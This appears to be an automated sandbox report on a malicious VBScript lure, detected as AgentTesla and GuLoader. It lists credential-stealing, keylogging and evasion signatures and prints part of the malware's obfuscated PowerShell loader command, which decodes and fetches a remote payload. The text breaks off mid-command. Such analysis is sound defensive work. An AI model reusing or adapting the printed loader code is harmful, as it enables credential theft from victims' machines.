Edit tour
Windows
Analysis Report
Arrival Notice PUS_pdf.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7468 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Arriv al Notice PUS_pdf.vb s" MD5: A47CBE969EA935BDD3AB568BB126BC80) - WmiPrvSE.exe (PID: 7572 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - powershell.exe (PID: 7660 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Klervske = 1;$Heng ivnes='Sub strin';$He ngivnes+=' g';Functio n Banuyo17 ($Koloniha ves){$Para glossia=$K olonihaves .Length-$K lervske;Fo r($Grazer= 5; $Grazer -lt $Para glossia; $ Grazer+=(6 )){$Fradra ge249+=$Ko lonihaves. $Hengivnes .Invoke($G razer, $Kl ervske);}$ Fradrage24 9;}functio n decouple d($Caloric ally){& ( $Sommerper ioden) ($C alorically );}$Brodfr s=Banuyo17 'B mbeMst illor,kalz RehoniGema tlLacerlMa tria asse/ P.oc5Klod s.Sy.sl0Az otu prore( BjerWBusk aiUfejlnLi gkad,ycloo UdstawRess osStarn Cr an,NArbejT Kisse Depe 1Kv te0Inc re.O lys0 Nove; H na pathoWScr obiBndlenL oved6A.skr 4Ma.ne;For a PresixO blig6Imper 4Uophr;Fej lb KvalirS hiitvTinct : Gru 1Car ro2Le,kb1D iasy. Demu 0Smi g) sk in RumplGE nosteSolit c Fo hkCym a,o Blnd/P aape2H.rsk 0 Doze1 of ma0Tasti0U nbad1Distr 0Odont1Vag ,e TosseFB rohoi Semi r,yvsteBrn esf SkiroV elsexExuld /Bevis1Uja ev2Samos1E xter.Thwac 0Sees ';$S tenotaphru m=Banuyo17 'Trbl,UKo mplsStatse Smaalr Hj, o-Det,uALo vfog ,aste Foromn Un ntGreg ';$ Amputation er=Banuyo1 7 'Sederh Ar.dtFrems ttredip.lu klsGalde: Ansk/Fr.ml /AntiadKvs ter MandiF ripavSati. eG.lio. Si kkgSeb soB yto,oMaxim gNontelBal ieEinar.S yntacArb.j o ,gebmBal da/Interug onofcOvera ?TakeueUvi stxKvit,pR ,maioindbe rTranst Pr ee=CaissdP osteoBowle wCorn,n St eelUns.loM atera Bonc d Besi&O e rfiUnburdS ynta=Prten 1,aghuoPar s lMelonGI mper4under RSho.t0Exc urHtang,LU ntrejAut e L,aben5Ast ho0Ton.dh u,viYGodke vMel eD In cruCylinsI .olaEUrtep _DistrSHyp erTAfl s-K ulbrCScrev KHugorhThe rmKImperIP add r Db.f - FrasD.ve rvRNo,ar ' ;$Laservid =Banuyo17 'Mili.>.nt en ';$Somm erperioden =Banuyo17 'Ga boiFor .seForndxV ars ';$ps eudonitros ite = Banu yo17 'Bru, eeCr.chc P .coh.odomo .kuds Afsn i%Sol,eaRe .sepUnderp Truand.ice baSavortSe ctiaUnder% Hangm\Ene gASkotjuSy stesWopudt SprorAllo saIndsklPr emiiGigg.a balln for ssAmygd. A lsiHNormto St rmvCork a Chond& S k u& Stan Sp,see Orn ,cErhvehmo naroTerep .epu$ Coal ';decoupl ed (Banuyo 17 'Overk$ Kkkeng J,g elLivsooUd ,tibSleepa photolBard a:NewsdF O s.auMultil Fe.tud Typ hmTamaraKl aveaEllipn ForstePara lrOptag=St ran(,torkc ,anghmRea tdNerve Sk unk/Brrenc Indl Langb $UndulpInd h sPr.oceO rganuhemli dAust oLok alnTerroi ImmatTromb rR.dimoCon ,es Lig i Mcmutdknav eMotor)Ind s ');decou pled (Banu yo17 ',rns k$F,stegSi li lSaksno Pr.blbAgha naBeseelTr iak:StaffB D wcooGall ftGngerr u ndey Cecel Ko,gelEmot ii.appedSn akea K aje U.ret=Udde l$fyrinA,l utmm.osimp Fra auBeke ntSubdeaCo stltIndpoi CholaoSemi wnOpstaeBu ffer Unsy. Commissynk rpMaterl P olliFlight Scra( Fus i$Fr igLln suma Cir.s MetaeKuns trModerv O ptaibirgid